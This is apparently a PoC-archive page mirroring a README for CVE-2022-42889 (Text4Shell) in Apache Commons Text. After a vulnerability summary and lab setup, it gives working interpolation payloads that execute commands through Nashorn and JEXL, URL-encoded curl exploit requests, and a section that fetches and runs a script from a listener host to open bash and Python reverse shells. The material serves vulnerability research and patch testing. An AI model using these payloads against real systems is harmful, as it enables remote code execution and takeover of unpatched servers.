Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%

CVE-2022-42889 PoC — Apache Commons Text prior to 1.10.0 allows RCE when applied to untrusted input due to insecure interpolation defaults

Source
Associated Vulnerability
Title:Apache Commons Text prior to 1.10.0 allows RCE when applied to untrusted input due to insecure interpolation defaults (CVE-2022-42889)
Description:Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
Description
CVE-2022-42889 aka Text4Shell research & PoC
Readme
# CVE-2022-42889 aka text4shell

PoC for recently discovered [vulnerability](https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/) in Apache Commons Text by [@pwntester](https://github.com/pwntester):

As mentioned in https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/:
>The vulnerability exists in the StringSubstitutor interpolator object. An interpolator is created by the StringSubstitutor.createInterpolator() method and will allow for string lookups as defined in the StringLookupFactory. This can be used by passing a string “${prefix:name}” where the prefix is the aforementioned lookup. Using the “script”, “dns”, or “url” lookups would allow a crafted string to execute arbitrary scripts when passed to the interpolator object.

# Affected versions
The affected Apache Commons Text versions are 1.5 through 1.9.
It has been patched in version 1.10.

# Conditions to be exploited
- Run a version of Apache Commons Text from version 1.5 to 1.9
- Use the [StringSubstitutor](https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) interpolator class

To be remotely exploited, attacker controlled input must be used as input for the StringSubstitutor interpolation. In particular, in `StringSubstitutor.replace()` or `StringSubstitutor.replaceIn()` methods

# Other javascript script engines
Since JDK 15 the Nashorn JavaScript Engine was removed: https://openjdk.org/jeps/372. 
But if third parties dependencies are included such as JEXL, RCE in Apache Commnos Text could happen (https://twitter.com/pwntester/status/1582321752566161409)

# Exploitation
## script interpolator
It can be exploited to gain RCE.

### JDK < 15
Nashorn engine:
```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
### JDK 15+ 
If using third party JEXL:
```
${script:JEXL:''.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}
```

## dns interpolator
It can lead to a DNS lookup:

```
${dns:address|commons.apache.org}
```

## url interpolator
It connects to the specified URL and tries to fetch the content:

```
${url:UTF-8:https://nvd.nist.gov/vuln/detail/CVE-2022-42889}
```

# Manual compilation of PoC
Template based on https://start.spring.io/

```
mvn clean package -DskipTests
java -jar spring-boot-0.0.1-SNAPSHOT.jar 
```

# Running app in Docker 

## Using JVM 11
```
sudo docker build -t text4shell . -f Dockerfile.Java11
sudo docker run -p 8080:8080 text4shell 
```

## Using JVM 19
```
sudo docker build -t text4shell . -f Dockerfile.Java19
sudo docker run -p 8080:8080 text4shell 
```

# Provided POCs

There are different endpoints provided to test for the different attack vectors mentioned.

## /poc1
![image](https://user-images.githubusercontent.com/17437230/197401848-b78ffbe9-6ed9-4311-80e7-a740273c8214.png)

```
curl http://localhost:8080/poc1
```

![image](https://user-images.githubusercontent.com/17437230/197400588-a0ccdf5e-9f0d-4cc9-b640-0748a5009b88.png)


## /poc2
![image](https://user-images.githubusercontent.com/17437230/197401868-7b036a29-7a92-4130-a2fb-383f8b9108eb.png)

```
curl http://localhost:8080/poc2
```
![image](https://user-images.githubusercontent.com/17437230/197400614-3a3a833f-a389-4d89-b5b1-55031aae94c7.png)


## /poc3
![image](https://user-images.githubusercontent.com/17437230/197401879-f3d51c8a-d89b-45a3-a82a-1b110b79ae26.png)

```
curl http://localhost:8080/poc3
```
![image](https://user-images.githubusercontent.com/17437230/197400681-68cea873-32db-4d70-a73a-84f17e0bd9f3.png)


## /message?text=
```
curl http://localhost:8080/message
curl http://localhost:8080/message?text=1
```
![image](https://user-images.githubusercontent.com/17437230/197400701-d510a14a-f84f-40ad-a366-ac728d2d5b8a.png)

Using Nashorn:
```
curl http://localhost:8080/message?text=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27touch%20%2Ftmp%2Ffoo%27)%7D
```
![image](https://user-images.githubusercontent.com/17437230/197400719-bca9c7bd-6ed6-401c-a5a6-816421b10b4a.png)
![image](https://user-images.githubusercontent.com/17437230/197400762-be8edd58-746b-477a-b88a-dacc8a0e3745.png)


Using JEXL:
```
curl http://localhost:8080/message?text=%24%7Bscript%3AJEXL%3A%27%27.getClass().forName(%27java.lang.Runtime%27).getRuntime().exec(%27touch%20%2Ftmp%2Fpwned%27)%7D
```

![image](https://user-images.githubusercontent.com/17437230/197401400-7f808c80-8d6a-4872-9ac3-70fe6abdc110.png)

![image](https://user-images.githubusercontent.com/17437230/197401492-76d72ee8-5fe9-4d77-a8bf-1208637b6d33.png)


# Get a reverse shell

Just to be simple I am using the default Docker interface for netcat listener.
Poking around, I came up with these payloads with bash and python reverse shells working ok:

```
${script:javascript:java.lang.Runtime.getRuntime().exec('curl -s http://172.17.0.1:3333/rev.sh -o /tmp/rev.sh')}
${script:javascript:java.lang.Runtime.getRuntime().exec('bash /tmp/rev.sh')}
```

Where rev.sh is served with these possible contents:

```
bash -i >& /dev/tcp/172.17.0.1/5555 0>&1
```

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.17.0.1,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![image](https://user-images.githubusercontent.com/17437230/197407317-5aedfd4b-c425-4a23-b65f-ebf039cce5a2.png)
![image](https://user-images.githubusercontent.com/17437230/197407480-beda6518-795d-4d15-8a33-655beb679ad2.png)


![image](https://user-images.githubusercontent.com/17437230/197407304-377295cf-8750-4a88-8b61-cd07ba3445bc.png)
![image](https://user-images.githubusercontent.com/17437230/197407333-dcae01ae-ac48-4eae-8d9c-be9a7a393970.png)



# References
- https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
- https://sysdig.com/blog/cve-2022-42889-text4shell/
- https://nakedsecurity.sophos.com/2022/10/18/dangerous-hole-in-apache-commons-text-like-log4shell-all-over-again/
- https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
- https://www.cyberkendra.com/2022/10/apache-commons-text-code-execution.html
- https://twitter.com/pwntester/status/1583189642471706624
- https://twitter.com/pyn3rd/status/1582729285005037568
- https://medium.com/@cxzero/text4shell-cve-2022-42889-brief-vulnerability-analysis-and-exploitation-fe13a0baadbb

# Credits to other PoCs
- https://github.com/SeanWrightSec/CVE-2022-42889-PoC/
- https://github.com/korteke/CVE-2022-42889-POC
- https://github.com/karthikuj/cve-2022-42889-text4shell-docker
- https://github.com/ClickCyber/cve-2022-42889/blob/main/CVE-2022-42889.php
- https://github.com/kljunowsky/CVE-2022-42889-text4shell
- https://github.com/securekomodo/text4shell-poc
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →